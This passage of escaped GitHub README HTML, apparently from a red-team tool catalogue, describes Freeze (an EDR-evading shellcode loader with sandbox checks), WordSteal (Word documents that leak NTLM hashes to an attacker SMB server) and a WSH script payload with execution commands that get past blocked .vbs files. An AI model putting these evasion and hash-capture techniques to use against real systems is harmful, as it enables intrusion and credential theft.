1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFreeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFreeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/optiv/Freeze\ncd Freeze\ngo build Freeze.go\"\u003e\u003cpre\u003egit clone https://github.com/optiv/Freeze\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Freeze\ngo build Freeze.go\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\" -I string\n Path to the raw 64-bit shellcode.\n -O string\n Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n -encrypt\n Encrypts the shellcode using AES 256 encryption\n -export string\n For DLL Loaders Only - Specify a specific Export function for a loader to have.\n -process string\n The name of process to spawn. This process has to exist in C:\\Windows\\System32\\. Example 'notepad.exe' (default \u0026quot;notepad.exe\u0026quot;)\n -sandbox\n Enables sandbox evasion by checking:\n Is Endpoint joined to a domain?\n Does the Endpoint have more than 2 CPUs?\n Does the Endpoint have more than 4 gigs of RAM?\n -sha256\n Provides the SHA256 value of the loaders (This is useful for tracking)\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e -I string\n Path to the raw 64-bit shellcode.\n -O string\n Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n -encrypt\n Encrypts the shellcode using AES 256 encryption\n -export string\n For DLL Loaders Only - Specify a specific Export function for a loader to have.\n -process string\n The name of process to spawn. This process has to exist in C:\\Windows\\System32\\. Example 'notepad.exe' (default \"notepad.exe\")\n -sandbox\n Enables sandbox evasion by checking:\n Is Endpoint joined to a domain?\n Does the Endpoint have more than 2 CPUs?\n Does the Endpoint have more than 4 gigs of RAM?\n -sha256\n Provides the SHA256 value of the loaders (This is useful for tracking)\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.blackhatethicalhacking.com/tools/freeze/\" rel=\"nofollow\"\u003ehttps://www.blackhatethicalhacking.com/tools/freeze/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/0x09AL/WordSteal\"\u003eWordSteal\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-wordsteal\" class=\"anchor\" aria-label=\"Permalink: 🔙WordSteal\" href=\"#wordsteal\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMicrosoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/0x09AL/WordSteal\ncd WordSteal\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/0x09AL/WordSteal\ncd WordSteal\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Generate document containing 'test.jpg' and start listener\n./main.py 127.0.0.1 test.jpg 1\n\n# Generate document containing 'test.jpg' and do not start listener\n./main.py 127.0.0.1 test.jpg 0\\n\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate document containing 'test.jpg' and start listener\u003c/span\u003e\n./main.py 127.0.0.1 test.jpg 1\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate document containing 'test.jpg' and do not start listener\u003c/span\u003e\n./main.py 127.0.0.1 test.jpg 0\u003cspan class=\"pl-cce\"\u003e\\n\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/\" rel=\"nofollow\"\u003ehttps://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"http://undocumented.ntinternals.net/\" rel=\"nofollow\"\u003eNTAPI Undocumented Functions\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-ntapi-undocumented-functions\" class=\"anchor\" aria-label=\"Permalink: 🔙NTAPI Undocumented Functions\" href=\"#ntapi-undocumented-functions\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eWhen developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit \u003ca href=\"http://undocumented.ntinternals.net/\" rel=\"nofollow\"\u003ehttp://undocumented.ntinternals.net/\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/238468558-41b424f3-053c-440b-b0fd-235e95980d9a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NTU4LTQxYjQyNGYzLTA1M2MtNDQwYi1iMGZkLTIzNWU5NTk4MGQ5YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZTYxYTllMzM4YjQ0YzFhMGQ4YWFiNDI4Zjk5MzVmNWE0NGYwYzIwZGVjZTc0NzQxNjEwNDMyNjM2NTIxYzlhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.HDIb4rJn4kmn4hW2vKSlOm3SUxbcrQBmaXn9ic-uDBE\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/238468558-41b424f3-053c-440b-b0fd-235e95980d9a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NTU4LTQxYjQyNGYzLTA1M2MtNDQwYi1iMGZkLTIzNWU5NTk4MGQ5YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZTYxYTllMzM4YjQ0YzFhMGQ4YWFiNDI4Zjk5MzVmNWE0NGYwYzIwZGVjZTc0NzQxNjEwNDMyNjM2NTIxYzlhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.HDIb4rJn4kmn4hW2vKSlOm3SUxbcrQBmaXn9ic-uDBE\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"http://undocumented.ntinternals.net/\" rel=\"nofollow\"\u003ehttp://undocumented.ntinternals.net/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://codemachine.com/articles/kernel_callback_functions.html\" rel=\"nofollow\"\u003eKernel Callback Functions\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-kernel-callback-functions\" class=\"anchor\" aria-label=\"Permalink: 🔙Kernel Callback Functions\" href=\"#kernel-callback-functions\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis technical note provides a comprehensive list all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMost of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe undocumented functions are described briefly whereas the documented ones are just listed here for reference.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit \u003ca href=\"https://codemachine.com/articles/kernel_callback_functions.html\" rel=\"nofollow\"\u003ehttps://codemachine.com/articles/kernel_callback_functions.html\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/238468952-b7532b7d-1abc-4af6-be92-f6f78d24a788.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4OTUyLWI3NTMyYjdkLTFhYmMtNGFmNi1iZTkyLWY2Zjc4ZDI0YTc4OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MzAxMThiZmJiNThjODRlNjhhZjg0MGIxNTA1NjM2NzUwYjM5OWI3M2ExMWVjOTVhNGNmZWZiMjUyYWI5ODU1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Tt9OQSD5FulZC8wa8jzvl6vNGV4xwPqdbJk50WUnNLA\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/238468952-b7532b7d-1abc-4af6-be92-f6f78d24a788.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4OTUyLWI3NTMyYjdkLTFhYmMtNGFmNi1iZTkyLWY2Zjc4ZDI0YTc4OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MzAxMThiZmJiNThjODRlNjhhZjg0MGIxNTA1NjM2NzUwYjM5OWI3M2ExMWVjOTVhNGNmZWZiMjUyYWI5ODU1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Tt9OQSD5FulZC8wa8jzvl6vNGV4xwPqdbJk50WUnNLA\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://codemachine.com\" rel=\"nofollow\"\u003ehttps://codemachine.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/S3cur3Th1sSh1t/OffensiveVBA\"\u003eOffensiveVBA\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-offensivevba\" class=\"anchor\" aria-label=\"Permalink: 🔙OffensiveVBA\" href=\"#offensivevba\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit \u003ca href=\"https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo\"\u003ehttps://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/238468760-7f7ad942-48d7-42e7-a3cc-55ec84139058.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NzYwLTdmN2FkOTQyLTQ4ZDctNDJlNy1hM2NjLTU1ZWM4NDEzOTA1OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMTY4YjI3NzE5NTUxMmIxZjM1NzA4ODQ3NWJmZWY1Zjc3ZGJkYjlkYmM3ZjA4M2VjNThkZjEwMWNmYjU0YzE0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.a3c8B_beIWc5ltk0GN7Mcfmkgsbb2DJtWxEGwUvg1sA\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/238468760-7f7ad942-48d7-42e7-a3cc-55ec84139058.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NzYwLTdmN2FkOTQyLTQ4ZDctNDJlNy1hM2NjLTU1ZWM4NDEzOTA1OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMTY4YjI3NzE5NTUxMmIxZjM1NzA4ODQ3NWJmZWY1Zjc3ZGJkYjlkYmM3ZjA4M2VjNThkZjEwMWNmYjU0YzE0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.a3c8B_beIWc5ltk0GN7Mcfmkgsbb2DJtWxEGwUvg1sA\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/S3cur3Th1sSh1t\"\u003ehttps://github.com/S3cur3Th1sSh1t\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eWSH\u003c/h3\u003e\u003ca id=\"user-content-wsh\" class=\"anchor\" aria-label=\"Permalink: 🔙WSH\" href=\"#wsh\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCreating payload:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-vbnet notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Set shell = WScript.CreateObject(\u0026quot;Wscript.Shell\u0026quot;)\nshell.Run(\u0026quot;C:\\Windows\\System32\\calc.exe \u0026quot; \u0026amp; WScript.ScriptFullName),0,True\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003eSet\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eshell\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eWScript.CreateObject(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"Wscript.Shell\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e)\u003c/span\u003e\n\u003cspan class=\"pl-smi\"\u003eshell.Run(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"C:\\Windows\\System32\\calc.exe \"\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003e\u0026amp;\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eWScript.ScriptFullName),\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-k\"\u003eTrue\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eExecute:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"wscript payload.vbs\ncscript.exe payload.vbs\nwscript /e:VBScript payload.txt //If .vbs files are blacklisted\"\u003e\u003cpre\u003ewscript payload.vbs\ncscript.exe payload.vbs\nwscript /e:VBScript payload.txt //If .vbs files are blacklisted\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eHTA\u003c/h3\u003e\u003ca id=\"user-content-hta\" class=\"anchor\" aria-label=\"Permalink: 🔙HTA\" href=\"#hta\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 